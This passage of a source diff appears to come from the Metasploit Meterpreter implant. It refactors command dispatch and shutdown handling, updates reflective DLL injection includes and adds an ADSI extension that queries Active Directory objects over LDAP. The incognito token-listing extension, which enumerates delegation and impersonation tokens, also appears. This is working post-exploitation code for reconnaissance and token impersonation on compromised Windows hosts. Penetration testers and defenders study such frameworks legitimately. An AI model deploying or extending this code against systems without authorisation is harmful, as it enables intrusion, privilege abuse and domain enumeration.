dprintf("[COMMAND] Completion handlers finished for %s. Returning: %s", lpMethod, (serverContinue ? "TRUE" : "FALSE"));
} while (0);
}
__except( EXCEPTION_EXECUTE_HANDLER )
__except (EXCEPTION_EXECUTE_HANDLER)
{
dprintf("[COMMAND] Exception hit in command %s", command->method );
dprintf("[COMMAND] Exception hit in command %s", lpMethod);
}
packet_destroy( packet );
packet_destroy(packet);
return serverContinue;
}
/*!
* @brief Attempt to locate a command in the base command list.
* @param method String that identifies the command.
* @returns Pointer to the command entry in the base command list.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
*/
Command* command_locate_base(const char* method)
{
DWORD index;
dprintf("[COMMAND EXEC] Attempting to locate base command %s", method);
for (index = 0; baseCommands[index].method; ++index)
{
if (strcmp(baseCommands[index].method, method) == 0)
{
return &baseCommands[index];
}
}
dprintf("[COMMAND EXEC] Couldn't find base command %s", method);
return NULL;
}
/*!
* @brief Attempt to locate a command in the extensions command list.
* @param method String that identifies the command.
* @returns Pointer to the command entry in the extensions command list.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
*/
Command* command_locate_extension(const char* method)
{
Command* command;
dprintf("[COMMAND EXEC] Attempting to locate extension command %s (%p)", method, extensionCommands);
for (command = extensionCommands; command; command = command->next)
{
if (strcmp(command->method, method) == 0)
{
return command;
}
}
dprintf("[COMMAND EXEC] Couldn't find extension command %s", method);
return NULL;
}
/*!
* @brief Handle an incoming command.
* @param remote Pointer to the \c Remote instance associated with this command.
@ -310,40 +406,63 @@ BOOL command_process_inline( Command *command, Remote *remote, Packet *packet )
* @sa command_process_inline
* @sa command_process_thread
*/
BOOL command_handle( Remote *remote, Packet *packet )
BOOL command_handle(Remote *remote, Packet *packet)
{
BOOL result = TRUE;
THREAD* cpt = NULL;
Command* command = NULL;
Command* baseCommand = NULL;
Command* extensionCommand = NULL;
Command** commands = NULL;
Packet* response = NULL;
PCHAR lpMethod = NULL;
Tlv methodTlv;
do
{
command = command_locate( packet );
if( command == NULL ) {
dprintf( "[DISPATCH] Command not found" );
// We have no matching command for this packet, so it won't get handled. We
// need to send an empty response and clean up here before exiting out.
response = packet_create_response( packet );
packet_transmit_response( ERROR_NOT_SUPPORTED, remote, response );
packet_destroy( packet );
if (packet_get_tlv_string(packet, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
{
dprintf("[COMMAND] Unable to extract method from packet.");
break;
}
if( command_is_inline( command, packet ) ) {
dprintf( "[DISPATCH] Executing inline: %s", command->method );
result = command_process_inline( command, remote, packet );
} else {
dprintf( "[DISPATCH] Executing in thread: %s", command->method );
cpt = thread_create( command_process_thread, remote, packet, command );
if( cpt )
lpMethod = (PCHAR)methodTlv.buffer;
baseCommand = command_locate_base(lpMethod);
extensionCommand = command_locate_extension(lpMethod);
if (baseCommand == NULL && extensionCommand == NULL) {
dprintf("[DISPATCH] Command not found: %s", lpMethod);
// We have no matching command for this packet, so it won't get handled. We
// need to send an empty response and clean up here before exiting out.
response = packet_create_response(packet);
packet_transmit_response(ERROR_NOT_SUPPORTED, remote, response);
packet_destroy(packet);
break;
}
// if either command is registered as inline, run them inline
if ((baseCommand && command_is_inline(baseCommand, packet))
|| (extensionCommand && command_is_inline(extensionCommand, packet)))
{
dprintf("[DISPATCH] Executing inline: %s", lpMethod);
result = command_process_inline(baseCommand, extensionCommand, remote, packet);
}
else
{
dprintf("[DISPATCH] Executing in thread: %s", lpMethod);
commands = (Command**)malloc(sizeof(Command*) * 2);
*commands = baseCommand;
*(commands + 1) = extensionCommand;
cpt = thread_create(command_process_thread, remote, packet, commands);
if (cpt)
{
dprintf( "[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle );
thread_run( cpt );
dprintf("[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle);
thread_run(cpt);
}
}
} while(0);
} while (0);
return result;
}
@ -353,34 +472,46 @@ BOOL command_handle( Remote *remote, Packet *packet )
* @param thread Pointer to the thread to execute.
* @return Result of thread execution (not the result of the command).
* @sa command_handle
* @sa command_process_thread
* @sa command_process_inline
*/
DWORD THREADCALL command_process_thread( THREAD * thread )
DWORD THREADCALL command_process_thread(THREAD * thread)
{
Command * command = NULL;
Remote * remote = NULL;
Packet * packet = NULL;
Command** commands = NULL;
Remote * remote = NULL;
Packet * packet = NULL;
if( thread == NULL )
dprintf("[COMMAND] executing in thread %p", thread);
if (thread == NULL)
{
return ERROR_INVALID_HANDLE;
}
remote = (Remote *)thread->parameter1;
if( remote == NULL )
if (remote == NULL)
{
return ERROR_INVALID_HANDLE;
}
packet = (Packet *)thread->parameter2;
if( packet == NULL )
if (packet == NULL)
{
return ERROR_INVALID_DATA;
}
command = (Command *)thread->parameter3;
if( command == NULL )
commands = (Command**)thread->parameter3;
if (commands == NULL)
{
return ERROR_INVALID_DATA;
}
if( commandThreadList == NULL )
if (commandThreadList == NULL)
{
commandThreadList = list_create();
if( commandThreadList == NULL )
if (commandThreadList == NULL)
{
return ERROR_INVALID_HANDLE;
}
#ifndef _WIN32
pthread_t tid;
@ -389,12 +520,21 @@ DWORD THREADCALL command_process_thread( THREAD * thread )
#endif
}
list_add( commandThreadList, thread );
list_add(commandThreadList, thread);
command_process_inline( command, remote, packet );
// invoke processing inline, passing in both commands
dprintf("[COMMAND] About to execute inline -> Commands: %p Command1: %p Command2: %p", commands, *commands, *(commands + 1));
command_process_inline(*commands, *(commands + 1), remote, packet);
dprintf("[COMMAND] Executed inline -> Commands: %p Command1: %p Command2: %p", commands, *commands, *(commands + 1));
if( list_remove( commandThreadList, thread ) )
thread_destroy( thread );
if (list_remove(commandThreadList, thread))
{
thread_destroy(thread);
}
// free things up now that the command stuff has been finished
dprintf("[COMMAND] Cleaning up commands");
free(commands);
return ERROR_SUCCESS;
}
@ -424,85 +564,6 @@ BOOL command_is_inline( Command *command, Packet *packet )
return FALSE;
}
/*!
* @brief Attempt to locate a command in the base command list.
* @param method String that identifies the command.
* @returns Pointer to the command entry in the base command list.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
*/
Command* command_locate_base( const char* method )
{
DWORD index;
dprintf( "[COMMAND EXEC] Attempting to locate base command %s", method );
for( index = 0; base_commands[index].method ; ++index )
if( strcmp( base_commands[index].method, method ) == 0 )
return &base_commands[index];
dprintf( "[COMMAND EXEC] Couldn't find base command %s", method );
return NULL;
}
/*!
* @brief Attempt to locate a command in the extensions command list.
* @param method String that identifies the command.
* @returns Pointer to the command entry in the extensions command list.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
*/
Command* command_locate_extension( const char* method )
{
Command* command;
dprintf( "[COMMAND EXEC] Attempting to locate extension command %s", method );
for( command = extension_commands; command; command = command->next )
if( strcmp( command->method, method ) == 0 )
return command;
dprintf( "[COMMAND EXEC] Couldn't find extension command %s", method );
return NULL;
}
/*!
* @brief Attempt to locate a command to execute based on the method.
* @param method String that identifies the command.
* @returns Pointer to the command entry to execute.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
* @remark This function tries to find an extension command first. If
* found it will be returned. If not, the base command list is
* queried. This supports the notion of extensions overloading
* the base commands.
* @sa command_locate_extension
* @sa command_locate_base
*/
Command* command_locate( Packet *packet )
{
Command* command = NULL;
DWORD dwResult;
Tlv methodTlv;
do
{
dwResult = packet_get_tlv_string( packet, TLV_TYPE_METHOD, &methodTlv );
if( dwResult != ERROR_SUCCESS ) {
dprintf( "[COMMAND] Unable to extract method from packet." );
break;
}
// check for an overload first.
command = command_locate_extension( (PCHAR)methodTlv.buffer );
// if no overload, then fallback on base.
if( command == NULL )
command = command_locate_base( (PCHAR)methodTlv.buffer );
} while(0);
return command;
}
/*!
* @brief Validate command arguments
* @return Indication of whether the commands are valid or not.

11
c/meterpreter/source/common/base_dispatch_common.c
View File

@ -303,8 +303,8 @@ DWORD remote_request_core_channel_close(Remote *remote, Packet *packet)
Packet *response = packet_create_response(packet);
DWORD res = ERROR_SUCCESS, channelId;
Channel *channel = NULL;
dprintf( "[CHANNEL] remote_request_core_channel_close." );
dprintf("[CHANNEL] remote_request_core_channel_close.");
do
{
@ -322,7 +322,9 @@ DWORD remote_request_core_channel_close(Remote *remote, Packet *packet)
channel_destroy(channel, packet);
if (response)
{
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channelId);
}
} while (0);
@ -629,9 +631,12 @@ DWORD remote_request_core_shutdown( Remote *remote, Packet *packet, DWORD* pResu
packet_add_tlv_bool( response, TLV_TYPE_BOOL, TRUE );
// Transmit the response
dprintf("[DISPATCH] Ack shutdown request");
packet_transmit_response( result, remote, response );
*pResult = result;
return TRUE;
dprintf("[DISPATCH] Telling dispatch loop to finish");
// We always return FALSE here to tell the server to terminate.
return FALSE;
}

2
c/meterpreter/source/common/common.h
View File

@ -162,7 +162,7 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
#include <wininet.h>
/*! @brief When defined, debug output is enabled on Windows builds. */
#define DEBUGTRACE 1
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)

2
c/meterpreter/source/elevator/elevator.c
View File

@ -16,7 +16,7 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// include the Reflectiveloader() function
#include "../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
/*
* Grab a DWORD value out of the command line.

4
c/meterpreter/source/extensions/bare/bare.c
View File

@ -4,11 +4,11 @@
*/
#include "../../common/common.h"
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();

4
c/meterpreter/source/extensions/espia/espia.c
View File

@ -9,11 +9,11 @@
#include "screen.h"
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor

171
c/meterpreter/source/extensions/extapi/adsi.c Normal file
View File

@ -0,0 +1,171 @@
/*!
* @file adsi.c
* @brief Definitions for ADSI functionality.
*/
#include "extapi.h"
#include "adsi.h"
#include "adsi_interface.h"
/*! @brief The default page size to use when no page size is specified */
#define DEFAULT_PAGE_SIZE 1000
/*!
* @brief Helper function that converts an ASCII string to a wide char string.
* @param lpValue ASCII string to convert.
* @param lpwValue Target memory for the converted string.
* @remark \c lpwValue must be freed by the caller using `free`.
* @returns Indication of success or failure.
*/
DWORD to_wide_string(LPSTR lpValue, LPWSTR* lpwValue)
{
size_t charsCopied = 0;
DWORD valueLength;
DWORD dwResult;
do
{
if (lpValue == NULL)
{
BREAK_WITH_ERROR("[EXTAPI ADSI] Value parameter missing", ERROR_INVALID_PARAMETER);
}
valueLength = lstrlenA(lpValue);
*lpwValue = (LPWSTR)malloc(sizeof(WCHAR)* (lstrlenA(lpValue) + 1));
if (*lpwValue == NULL)
{
BREAK_WITH_ERROR("[EXTAPI ADSI] Unable to allocate memory", ERROR_OUTOFMEMORY);
}
mbstowcs_s(&charsCopied, *lpwValue, valueLength + 1, lpValue, valueLength);
dwResult = ERROR_SUCCESS;
} while (0);
return dwResult;
}
/*!
* @brief Enumerate all the users in AD.
* @param remote Pointer to the \c Remote instance.
* @param packet Pointer to the incoming \c Packet instance.
* @returns Indication of success or failure.
* @remark Real error codes are returned to the caller via a response packet.
*/
DWORD request_adsi_domain_query(Remote *remote, Packet *packet)
{
DWORD dwResult = ERROR_SUCCESS;
LPSTR lpValue = NULL;
LPWSTR lpwDomain = NULL;
LPWSTR lpwFilter = NULL;
LPWSTR* lpwFields = NULL;
DWORD fieldCount = 0;
DWORD fieldIndex = 0;
Packet * response = packet_create_response(packet);
Tlv fieldTlv;
DWORD maxResults;
DWORD pageSize;
do
{
if (!response)
{
BREAK_WITH_ERROR("[EXTAPI ADSI] Unable to create response packet", ERROR_OUTOFMEMORY);
}
lpValue = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_ADSI_DOMAIN);
dprintf("[EXTAPI ADSI] Domain: %s", lpValue);
dwResult = to_wide_string(lpValue, &lpwDomain);
if (dwResult != ERROR_SUCCESS)
{
dprintf("[EXTAPI ADSI] Failed to get Domain");
break;
}
lpValue = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_ADSI_FILTER);
dprintf("[EXTAPI ADSI] Filter: %s", lpValue);
dwResult = to_wide_string(lpValue, &lpwFilter);
if (dwResult != ERROR_SUCCESS)
{
dprintf("[EXTAPI ADSI] Failed to get Filter");
break;
}
maxResults = packet_get_tlv_value_uint(packet, TLV_TYPE_EXT_ASDI_MAXRESULTS);
dprintf("[EXTAPI ADSI] Max results will be %u", maxResults);
pageSize = packet_get_tlv_value_uint(packet, TLV_TYPE_EXT_ASDI_PAGESIZE);
dprintf("[EXTAPI ADSI] Page size specified as %u", pageSize);
// Set the page size to something sensible if not given.
if (pageSize == 0)
{
pageSize = DEFAULT_PAGE_SIZE;
}
// If max results is given, there's no point in having a page size
// that's bigger!
if (maxResults != 0)
{
pageSize = min(pageSize, maxResults);
}
dprintf("[EXTAPI ADSI] Page size will be %u", pageSize);
while (packet_enum_tlv(packet, fieldCount, TLV_TYPE_EXT_ADSI_FIELD, &fieldTlv) == ERROR_SUCCESS)
{
lpValue = (char*)fieldTlv.buffer;
dprintf("[EXTAPI ADSI] Field %u: %s", fieldCount, lpValue);
lpwFields = (LPWSTR*)realloc(lpwFields, sizeof(LPWSTR) * (fieldCount + 1));
if (lpwFields == NULL)
{
BREAK_WITH_ERROR("[EXTAPI ADSI] Unable to allocate memory", ERROR_OUTOFMEMORY);
}
dwResult = to_wide_string(lpValue, &lpwFields[fieldCount]);
if (dwResult != ERROR_SUCCESS)
{
dprintf("[EXTAPI ADSI] Failed to get field as wide string");
break;
}
++fieldCount;
}
dprintf("[EXTAPI ADSI] Field count: %u", fieldCount, lpValue);
if (dwResult == ERROR_SUCCESS)
{
dprintf("[EXTAPI ADSI] Beginning user enumeration");
dwResult = domain_query(lpwDomain, lpwFilter, lpwFields, fieldCount, maxResults, pageSize, response);
dprintf("[EXTAPI ADSI] Result of processing: %u (0x%x)", dwResult, dwResult);
}
} while (0);
if (lpwFields)
{
for (fieldIndex = 0; fieldIndex < fieldCount; ++fieldIndex)
{
if (lpwFields[fieldIndex])
{
free(lpwFields[fieldIndex]);
}
}
free(lpwFields);
}
if (lpwFilter)
{
free(lpwFilter);
}
if (lpwDomain)
{
free(lpwDomain);
}
dprintf("[EXTAPI ADSI] Transmitting response back to caller.");
if (response)
{
packet_transmit_response(dwResult, remote, response);
}
return dwResult;
}

12
c/meterpreter/source/extensions/extapi/adsi.h Normal file
View File

@ -0,0 +1,12 @@
/*!
* @file adsi.h
* @brief Declarations for ADSI support.
*/
#ifndef _METERPRETER_SOURCE_EXTENSION_EXTAPI_ADSI_H
#define _METERPRETER_SOURCE_EXTENSION_EXTAPI_ADSI_H
//DWORD request_adsi_user_enum(Remote *remote, Packet *packet);
//DWORD request_adsi_computer_enum(Remote *remote, Packet *packet);
DWORD request_adsi_domain_query(Remote *remote, Packet *packet);
#endif

199
c/meterpreter/source/extensions/extapi/adsi_interface.cpp Normal file
View File

@ -0,0 +1,199 @@
/*!
* @file adsi_interface.cpp
* @brief Definitions for functions that directly interact with ADSI
* through the (awful) COM interface.
*/
extern "C" {
#include "extapi.h"
#include <Iads.h>
#include <Adshlp.h>
#include <AdsErr.h>
#include "adsi_interface.h"
}
#pragma comment(lib, "Activeds.lib")
#define VALUE_SIZE 512
#define PATH_SIZE 256
/*! @brief The GUID of the Directory Search COM object. */
static const IID IID_IDirectorySearch = { 0x109BA8EC, 0x92F0, 0x11D0, { 0xA7, 0x90, 0x00, 0xC0, 0x4F, 0xD8, 0xD5, 0xA8 } };
/*!
* @brief Perform a domain query via ADSI.
* @param lpwDomain Name of the domain that is to be queried.
* @param lpwFilter The filter to use when reading objects (LDAP style).
* @param lpwQueryCols Array of column names representing fields to extract.
* @param queryColCount Number of columns in \c lpwQueryCols.
* @param maxResults The maximum number of results to return.
* @param pageSize The size of the page of results to return.
* @param response The response \c Packet to add the results to.
*/
DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
UINT queryColCount, DWORD maxResults, DWORD pageSize, Packet* response)
{
HRESULT hResult;
WCHAR cbPath[PATH_SIZE];
swprintf_s(cbPath, PATH_SIZE - 1, L"LDAP://%s", lpwDomain);
if ((hResult = CoInitialize(NULL)) == S_OK)
{
IDirectorySearch* pDirSearch = NULL;
ADS_SEARCH_HANDLE hSearch = NULL;
do
{
// start by trying to create the search object which we can use to run searches
hResult = ADsOpenObject(cbPath, NULL, NULL, ADS_SECURE_AUTHENTICATION | ADS_READONLY_SERVER, IID_IDirectorySearch, (void**)&pDirSearch);
if (hResult != S_OK)
{
dprintf("[ADSI] Unable to open domain: %x", hResult);
break;
}
// set the limit of results so that we don't take forever on large domains
ADS_SEARCHPREF_INFO prefInfo[4];
prefInfo[0].dwSearchPref = ADS_SEARCHPREF_SIZE_LIMIT;
prefInfo[0].vValue.dwType = ADSTYPE_INTEGER;
prefInfo[0].vValue.Integer = (ADS_INTEGER)maxResults;
prefInfo[1].dwSearchPref = ADS_SEARCHPREF_PAGESIZE;
prefInfo[1].vValue.dwType = ADSTYPE_INTEGER;
prefInfo[1].vValue.Integer = (ADS_INTEGER)pageSize;
prefInfo[2].dwSearchPref = ADS_SEARCHPREF_SEARCH_SCOPE;
prefInfo[2].vValue.dwType = ADSTYPE_INTEGER;
prefInfo[2].vValue.Integer = ADS_SCOPE_SUBTREE;
prefInfo[3].dwSearchPref = ADS_SEARCHPREF_CACHE_RESULTS;
prefInfo[3].vValue.dwType = ADSTYPE_BOOLEAN;
prefInfo[3].vValue.Boolean = false;
dprintf("[ADSI] Setting Max results to %u", (ADS_INTEGER)maxResults);
dprintf("[ADSI] Setting Page size to %u", (ADS_INTEGER)pageSize);
if (FAILED(hResult = pDirSearch->SetSearchPreference(prefInfo, 4)))
{
dprintf("[ADSI] Failed to set search settings %u %x", pageSize, hResult);
}
dprintf("[ADSI] Search executing");
hResult = pDirSearch->ExecuteSearch(lpwFilter, lpwQueryCols, queryColCount, &hSearch);
if (hResult != S_OK)
{
dprintf("[ADSI] Unable to execute the search");
break;
}
// These buffers are used to store the values that we're reading out of AD
Tlv* entries = (Tlv*)malloc(queryColCount * sizeof(Tlv));
char* values = (char*)malloc(queryColCount * VALUE_SIZE);
DWORD rowsProcessed = 0;
// now we iterate through the search results
while (SUCCEEDED((hResult = pDirSearch->GetNextRow(hSearch))) && (maxResults == 0 || rowsProcessed < maxResults))
{
if (hResult == S_ADS_NOMORE_ROWS)
{
hResult = S_OK;
// out of results, so bomb out of the loop
break;
}
DWORD dwIndex = 0;
size_t charsConverted;
ADS_SEARCH_COLUMN col;
// iterate through the columns, adding Tlv entries as we go, but only
// if we can get the values out.
for (DWORD colIndex = 0; colIndex < queryColCount; ++colIndex)
{
char* valueTarget = values + dwIndex * VALUE_SIZE;
entries[dwIndex].buffer = (PUCHAR)valueTarget;
entries[dwIndex].header.type = TLV_TYPE_EXT_ADSI_VALUE;
// try to do something sane based on the type that's being used to store
// the value.
HRESULT hr = pDirSearch->GetColumn(hSearch, lpwQueryCols[dwIndex], &col);
if (SUCCEEDED(hr))
{
switch (col.dwADsType)
{
case ADSTYPE_LARGE_INTEGER:
_i64toa_s(col.pADsValues->LargeInteger.QuadPart, valueTarget, VALUE_SIZE, 10);
entries[dwIndex].header.length = lstrlenA(valueTarget) + 1;
dprintf("[ADSI] Adding large int value %ul", (UINT)col.pADsValues->Integer);
break;
case ADSTYPE_INTEGER:
_itoa_s((UINT)col.pADsValues->Integer, valueTarget, VALUE_SIZE, 10);
entries[dwIndex].header.length = lstrlenA(valueTarget) + 1;
dprintf("[ADSI] Adding int value %u", (UINT)col.pADsValues->Integer);
break;
default:
WCHAR* source = col.dwADsType == ADSTYPE_CASE_IGNORE_STRING
? col.pADsValues->CaseIgnoreString
: col.pADsValues->CaseExactString;
wcstombs_s(&charsConverted, valueTarget, VALUE_SIZE, source, VALUE_SIZE - 1);
dprintf("[ADSI] Adding string %s", valueTarget);
entries[dwIndex].header.length = lstrlenA(valueTarget) + 1;
break;
}
pDirSearch->FreeColumn(&col);
}
else
{
dprintf("[ADSI] Col read failed: %x", hr);
valueTarget[0] = 0;
entries[dwIndex].header.length = 1;
}
dwIndex++;
}
if (dwIndex > 0)
{
dprintf("[ADSI] Adding group packet of %u values", dwIndex);
// Throw the user details together in a group, ready to return.
packet_add_tlv_group(response, TLV_TYPE_EXT_ADSI_RESULT, entries, dwIndex);
dprintf("[ADSI] Added group packet of %u values", dwIndex);
}
else
{
dprintf("[ADSI] Item found, but no fields extracted.");
}
++rowsProcessed;
}
dprintf("[ADSI] Processed %u. Final result: %u (0x%x)", rowsProcessed, hResult, hResult);
if (SUCCEEDED(hResult))
{
hResult = S_OK;
}
free(entries);
free(values);
} while (0);
if (hSearch != NULL)
{
pDirSearch->CloseSearchHandle(hSearch);
}
if (pDirSearch != NULL)
{
pDirSearch->Release();
}
CoUninitialize();
}
else
{
dprintf("[ADSI] Failed to initialize COM");
}
return (DWORD)hResult;
}

12
c/meterpreter/source/extensions/extapi/adsi_interface.h Normal file
View File

@ -0,0 +1,12 @@
/*!
* @file adsi_interface.h
* @brief Declarations for functions that deal directly with ADSI
* via the COM interfaces (hence the .cpp extension).
*/
#ifndef _METERPRETER_SOURCE_EXTENSION_EXTAPI_ADSI_INTERFACE_H
#define _METERPRETER_SOURCE_EXTENSION_EXTAPI_ADSI_INTERFACE_H
DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
UINT queryColCount, DWORD maxResults, DWORD pageSize, Packet* response);
#endif

6
c/meterpreter/source/extensions/extapi/extapi.c
View File

@ -4,15 +4,16 @@
*/
#include "../../common/common.h"
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "window.h"
#include "service.h"
#include "clipboard.h"
#include "adsi.h"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
@ -30,6 +31,7 @@ Command customCommands[] =
COMMAND_REQ("extapi_clipboard_monitor_resume", request_clipboard_monitor_resume),
COMMAND_REQ("extapi_clipboard_monitor_stop", request_clipboard_monitor_stop),
COMMAND_REQ("extapi_clipboard_monitor_dump", request_clipboard_monitor_dump),
COMMAND_REQ("extapi_adsi_domain_query", request_adsi_domain_query),
COMMAND_TERMINATOR
};

8
c/meterpreter/source/extensions/extapi/extapi.h
View File

@ -51,4 +51,12 @@
#define TLV_TYPE_EXT_CLIPBOARD_MON_DUMP MAKE_CUSTOM_TLV(TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 52)
#define TLV_TYPE_EXT_CLIPBOARD_MON_PURGE MAKE_CUSTOM_TLV(TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 53)
#define TLV_TYPE_EXT_ADSI_DOMAIN MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 55)
#define TLV_TYPE_EXT_ADSI_FILTER MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 56)
#define TLV_TYPE_EXT_ADSI_FIELD MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 57)
#define TLV_TYPE_EXT_ADSI_VALUE MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 58)
#define TLV_TYPE_EXT_ADSI_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 59)
#define TLV_TYPE_EXT_ASDI_MAXRESULTS MAKE_CUSTOM_TLV(TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 60)
#define TLV_TYPE_EXT_ASDI_PAGESIZE MAKE_CUSTOM_TLV(TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_EXTAPI, TLV_EXTENSIONS + 61)
#endif

55
c/meterpreter/source/extensions/incognito/incognito.c
View File

@ -9,11 +9,11 @@
#include "list_tokens.h"
#include "user_management.h"
#include "hash_stealer.h"
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
@ -37,59 +37,76 @@ DWORD request_incognito_list_tokens(Remote *remote, Packet *packet)
BOOL bTokensAvailable = FALSE;
TOKEN_ORDER token_order;
TOKEN_PRIVS token_privs;
char *delegation_tokens = calloc(sizeof(char), BUF_SIZE),
char *delegation_tokens = calloc(sizeof(char), BUF_SIZE),
*impersonation_tokens = calloc(sizeof(char), BUF_SIZE),
temp[BUF_SIZE] = "";
Packet *response = packet_create_response(packet);
token_order = packet_get_tlv_value_uint(packet, TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER);
dprintf("[INCOGNITO] Enumerating tokens");
// Enumerate tokens
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
dprintf("[INCOGNITO] Enumerating tokens failed with %u (%x)", GetLastError(), GetLastError());
packet_transmit_response(GetLastError(), remote, response);
return ERROR_SUCCESS;
}
dprintf("[INCOGNITO] Enumerating tokens succeeded, processing tokens");
// Process all tokens to get determinue unique names and delegation abilities
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
for (i = 0; i < num_tokens; i++)
{
process_user_token(token_list[i].token, uniq_tokens, &num_unique_tokens, token_order);
CloseHandle(token_list[i].token);
if (token_list[i].token)
{
dprintf("[INCOGNITO] Processing Token %x %s", token_list[i].token, token_list[i].username);
process_user_token(token_list[i].token, uniq_tokens, &num_unique_tokens, token_order);
CloseHandle(token_list[i].token);
dprintf("[INCOGNITO] Processed Token %x %s", token_list[i].token, token_list[i].username);
}
else
{
dprintf("[INCOGNITO] Skipping token %u", i);
}
}
// Sort by name and then display all delegation and impersonation tokens
dprintf("[INCOGNITO] sorting tokens");
qsort(uniq_tokens, num_unique_tokens, sizeof(unique_user_token), compare_token_names);
for (i=0;i<num_unique_tokens;i++)
for (i = 0; i < num_unique_tokens; i++)
if (uniq_tokens[i].delegation_available)
{
bTokensAvailable = TRUE;
strncat(delegation_tokens, uniq_tokens[i].username, BUF_SIZE-strlen(delegation_tokens)-1);
strncat(delegation_tokens, "\n", BUF_SIZE-strlen(delegation_tokens)-1);
strncat(delegation_tokens, uniq_tokens[i].username, BUF_SIZE - strlen(delegation_tokens) - 1);
strncat(delegation_tokens, "\n", BUF_SIZE - strlen(delegation_tokens) - 1);
}
if (!bTokensAvailable)
strncat(delegation_tokens, "No tokens available\n", BUF_SIZE-strlen(delegation_tokens)-1);
{
strncat(delegation_tokens, "No tokens available\n", BUF_SIZE - strlen(delegation_tokens) - 1);
}
bTokensAvailable = FALSE;
for (i=0;i<num_unique_tokens;i++)
if (!uniq_tokens[i].delegation_available && uniq_tokens[i].impersonation_available)
for (i = 0; i < num_unique_tokens; i++)
{
bTokensAvailable = TRUE;
strncat(impersonation_tokens, uniq_tokens[i].username, BUF_SIZE-strlen(impersonation_tokens)-1);
strncat(impersonation_tokens, "\n", BUF_SIZE-strlen(impersonation_tokens)-1);
if (!uniq_tokens[i].delegation_available && uniq_tokens[i].impersonation_available)
{
bTokensAvailable = TRUE;
strncat(impersonation_tokens, uniq_tokens[i].username, BUF_SIZE - strlen(impersonation_tokens) - 1);
strncat(impersonation_tokens, "\n", BUF_SIZE - strlen(impersonation_tokens) - 1);
}
}
if (!bTokensAvailable)
